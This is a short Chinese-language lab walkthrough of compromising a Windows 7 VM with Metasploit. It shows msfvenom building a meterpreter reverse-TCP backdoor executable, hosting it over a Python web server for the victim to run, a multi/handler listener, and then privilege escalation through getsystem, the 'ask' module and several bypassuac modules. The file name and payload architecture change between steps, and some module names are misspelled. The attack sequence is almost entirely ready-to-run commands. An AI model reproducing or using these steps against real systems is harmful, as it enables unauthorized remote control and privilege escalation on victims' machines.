1.环境准备
kali虚拟机
IP:192.168.112.66
靶机
win7 SP1
IP:192.168.112.145
2.生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe
这里我们为生成的木马指定了payload为:
windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66,监听端口为4444,文件输出格式为exe并保存到路径/tmp/hack.exe
3.使用python创建一个http服务器
SimpleHTTPServer是Python 2自带的一个模块,是Python的Web服务器。在Python 3已经合并到http.server模块中。如果不指定端口号默认的是8000端口。在局域网中使用web去访问http:/IP:8000即可
python2语法:python -m SimpleHTTPServer
win7访问 http://192.168.112.66:8000/ 拿到该后门程序并双击访问
3.开撸
3.1加载模块
msf5 > use exploit/multi/handler
3.2 设置payload
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
3.3 设置监听ip
msf5 exploit(multi/handler) > set lhost 192.168.112.66
3.4 设置监听port
msf5 exploit(multi/handler) > set LPORT 4444
3.5 执行
msf5 exploit(multi/handler) > exploit
4.查看权限
getuid
非system权限
5.权限提升
提权方法:
提高程序运行级别
UAC绕过
利用提权漏洞进行提权
5.1提高程序的运行级别
msf模块
exploit/windows/local/ask
执行会触发UAC
尝试getsystem提权,失败。
进入exploit/windows/local/ask
info查看信息
show optiaons查看选项
set session 设置连接
set filename 设置弹窗的提示
exploit 后 靶机uac会弹出点击是,获得一个新的session 2
进入session 2 getuid查看权限还是普通权限 getsystem提权 获得system权限
5.2 UAC绕过提权
msf模块
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injiction
exploit/windows/local/bypassuac_vbs